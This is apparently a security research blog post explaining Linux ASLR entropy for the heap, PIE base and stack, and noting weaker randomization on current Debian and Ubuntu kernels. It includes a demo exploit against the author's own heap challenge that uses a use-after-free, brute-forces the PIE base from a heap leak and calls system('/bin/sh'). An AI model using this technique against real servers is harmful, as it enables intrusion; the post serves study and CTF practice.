This article took a while, so buckle up!

Address Space Layout Randomization

(not kASLR)

ASLR - the bane of arbitrary write, and most exploits which, well, require an address.

Luckily, we can defeat ASLR by leaking something. For example, by leaking the address of one libc function, you can calculate the location of any other libc global variable and function, in that process.

And it affects everything! As long as it’s supported that is. If your libc and your target executable support PIE, you know nothing about any of the addresses.

screenshot of /proc/PID/maps of a dynamically loaded process supporting PIE

And the worst part, they are all different! So we need a separate leak for each section!
Or do we?

Have you noticed something weird? libc.so.6, vvar, vdso and ld all have addresses that start with 0x79993b, while a.out and the heap start with 0x56568a.

Is it possible that it’s predicable??

Spoiler: it is.

ELF mapping

When you execute ./a.out, your shell executes a syscall to the kernel, specifically execve.

$ strace ./a.out
execve("./a.out", ["./a.out"], 0x7fff10a66ea0 /* 48 vars */) = 0
...

Eventually, it parses the executable and starts to map it into memory. Because our executable supports PIE, the address at which it will be loaded will be randomized. Randomized how?

It depends on what is being randomized.

The heap

An important thing to remember is that “the heap” is just an algorithm for managing contiguous memory. So what we really care about is how this contiguous memory is allocated.

Most malloc implementations, including glibc’s ptmalloc, use the brk syscall for this purpose. Moving the page break every time the wilderness gets too small.

When the kernel loads an elf binary, using the function load_elf_binary, it, among other things, does the following:

mm->brk = mm->start_brk = arch_randomize_brk(mm);
current->brk_randomized = 1;

So the page break (i.e. where the heap starts) is being randomized.

Let’s check out arch_randomize_brk

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
    if (mmap_is_ia32())
        return randomize_page(mm->brk, SZ_32M);

    return randomize_page(mm->brk, SZ_1G);
}

mm->brk? That’s where we finished loading the ELF!
What does randomize_page do?

unsigned long randomize_page(unsigned long start, unsigned long range)
{
    /* snip */

    range >>= PAGE_SHIFT;
    /* snip */

    return start + (get_random_long() % range << PAGE_SHIFT);
}

It moves the start address up by some random value in the range [0,range). Even more so, we now know that

  • On x86_64 the range is 1 GB, giving us 18 bits of randomness
  • On x86_32 the range is 32 MB, giving us 13 bits of randomness

This means the ELF base is related to the heap base!!

BUT WAIT

This is the code for the latest to date linux kernel, but servers aren’t running on arch, right?
Before linux 6.9, arch_randomize_brk looked like this!

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
    return randomize_page(mm->brk, 0x02000000);
}

(0x02000000 is 32MB, like the x86_32 on the latest kernel!)

And guess what kernel version Ubuntu and Debian have?

Ubuntu 24.04 LTS comes with Linux 6.8 Debian 12 Bookworm comes with Linux 6.1

BOTH ARE VULNERABLE!

Ok, back to what this means.

If you can only leak either PIE or a heap address, you can brute force this randomness to convert PIE addresses to heap, and visa versa.

Even more so, when working with an ELF that does not support PIE, we already know the initial brk so on any normal server we will have to guess out of only 8192 options to get the heap base.

Of course if the target server is running Linux 6.9 or above, and it’s x86_64, then you will have to guess out of ~260'000 options, which is still not that much.

Demo

It’s not a technical post if I don’t show you some pretty pwned server screenshots, right?
So here you go

Obtaining shell by guessing ASLR

This is me pwning a simple heap chall I created, the gist of which is

switch (choice)
{
    case 1:
        if (!user)
        {
            user = malloc(sizeof(struct User));
            user->print = defaultPrint;
            user->uid = g_uid++;

            printf("username: ");
            read(0,user->name, sizeof(user->name));
        }
        break;

Mallocs a chunk and puts a function pointer in it. struct User and defaultPrint are

typedef void (*UserPrint)(struct User *user);

struct User
{
    char name[8];
    uint64_t uid;
    UserPrint print;
};

void defaultPrint(struct User *user)
{
    printf("%.8s\n", user->name);
}

Then there’s a basic UAF

    case 2:
        if (user)
        {
            printf("Cya!");
            free(user);
        }
        break;
    case 3:
        if (user)
        {
            user->print(user);
        }
        else
        {
            printf("login first\n");
        }
        break;

Which we can exploit by freeing user, which will put it in tcache, and then when we call print, we will leak the heap base.
Now how do we get RCE? The last menu option

    case 4:
    {
        const int password_length = 24;

        char *user_pass   = malloc(password_length);
        memset(user_pass, 0, password_length);
        read(0, user_pass, password_length);

        char *system_pass = malloc(password_length);
        memset(system_pass, 0, password_length);

        int fd = open("/dev/random", O_RDONLY);
        assert(fd >= 0);
        assert(read(fd, system_pass, password_length) == password_length);
        close(fd);

        if (memcmp(user_pass, system_pass, password_length) == 0)
        {
            user->uid = 0;
            user->print = adminPrint;
        }
        else
        {
            puts("Incorrect password. This incident will be reported.");
        }
        break;
    }
}

Because user was freed, its memory will be reused for user_pass, hence allowing us to write an arbitrary pointer to .print and get RCE!

But what are we going to call?
After all, sure, we can leak a heap address, but we can’t execute the heap (NX), and we don’t know any addresses which are executable. ASLR strikes again.

Luckily, we now know that exe address is 13 (or 18) bits of randomness away from the heap address, so we can just guess where it is!

I spun up a Debian Bookworm box, the latest stable Debian version.
I ran my exploit 16 times, and measured how long it took me to get a shell.

Here are the results

Results of the bruteforce showing an average of 7893 attempts and a median of 4833 attempts

The solve script can be found here.

My idea is to first login, and then immediately log out, hence putting the user into tcache 0x20

login(b"abc")
logout()

Now we can leak the heap base by reading the protected tcache pointer, which in our case is exactly heap base :D

heap_base = u64(whoami().ljust(8, b"\x00")) << 12

log.success(f"Heap base: {heap_base:#x}")

Now using what I found, we guess some offset from the base to the exe

EXE_BASE_TO_BSS_END_DIFF = 0x57520c251000 - 0x57520c24c000     # This is obtained from the real kernel-mapped pages
exe.address = heap_base - 0x1337000 - EXE_BASE_TO_BSS_END_DIFF # We can use any page aligned number up to 32MB :)

And finally we can overwrite the function pointer and the username, to the plt of system and /bin/sh respectively

sudo(fit({
    0: b"/bin/sh\x00",
    16: p64(exe.plt['system']),
}))

And execute

whoami(recv_leak=False)

And then of course we make sure to retry if the connection is closed before we are able to get shell (= we didn’t guess correctly). And as the image you saw above, we get shell on modern x86_64 debian system, by getting the PIE, without ever leaking PIE.

Obtaining shell by guessing ASLR

The stack

In fs/binfmt_elf.c, the Linux kernel executes the following function:

retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
                 executable_stack);

It finalizes some things, but we are interested in where it relocates the stack.

  1. The basic

    • STACK_TOP is 0x7ffffffff000 on x86_64 and 0xC0000000 on x86_32
  2. The obvious
    What’s randomize_stack_top?

    unsigned long randomize_stack_top(unsigned long stack_top)
    {
        unsigned long random_variable = 0;
    
        if (current->flags & PF_RANDOMIZE) {     // true when stack ASLR is enabled
            random_variable = get_random_long(); // a random u64/u32 on x86_64/x86_32
            random_variable &= STACK_RND_MASK;   // `0x3fffff` on x86_64 and `0x7ff` on x86_32
            random_variable <<= PAGE_SHIFT;      // 12 for 4KB paages
        }
        return PAGE_ALIGN(stack_top) - random_variable;
    }
    

    So, an example return value could be

    • 0x7fffb98e1000 = 0x7ffffffff000 - 0x4671e000 on x86_64
    • 0xbfbd1000 = 0xC0000000 - 0x42f000 on x86_32

    And gives us a total of

    • 22 bits of randomness on x86_64
    • 11 bits of randomness on x86_32

    This is only 2048 options for x86_32!

  3. The hidden
    You didn’t think that was it, did you?
    setup_arg_pages does one more thing:

    stack_top = arch_align_stack(stack_top);
    stack_top = PAGE_ALIGN(stack_top);
    

    For some reason, arch_align_stack not only 16 byte-aligns the stack, but also adds 9 bit of randomness

    unsigned long arch_align_stack(unsigned long sp)
    {
        if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
            sp -= get_random_u32_below(8192);
        return sp & ~0xf;
    }
    

    Now you might have noticed that we align stack_top right after adding the randomness, and you will be right! It doesn’t affect much the stack allocation page, but something much more sophisticated it going on here.

    If you ever tried to write to the stack using the address in procfs maps, you probably noticed that the offset changes every run! And rightfully so.

    After the Linux kernel copies your data into stack right at it’s top, it will eventually call create_elf_tables. And the first thing this function does is

    p = arch_align_stack(p);
    

    This time with no alignment or anything. Just raw 9 bits of random offset. Only after which will the kernel push the ELF auxiliary vectors, envp and argv.

    Hexdump showing the randomized stack gap

Hence, we get 9 bits, aka 512 options for the possible offset from the real base of the stack, to the one used by our program.

You can even see it in action, by writing a C program like

int main(int argc, char *argv[])
{
    uint64_t stack_after_random_addr = (uint64_t)argv;
    uint64_t stack_before_random_addr = (uint64_t)argv[0];
    printf("%ld\n", stack_before_random_addr - stack_after_random_addr);
}

And then recording the outputted values

offsets = set()
i = 0
while True:
    io = start()
    offsets.add(io.recvline())
    io.close()
    print(f"[ {i} ] len(set)={len(offsets)}")
    i += 1

When running, you will see that as the len approaches 512, the rate at which it changes slows down, as expected. Eventually it gets to 512, and stays there.

For example, I ran the loop 10'000 times Results of running the script above, showing <code>[ 10431 ] len(set)=512</code>

This is why we can’t have nice stacks.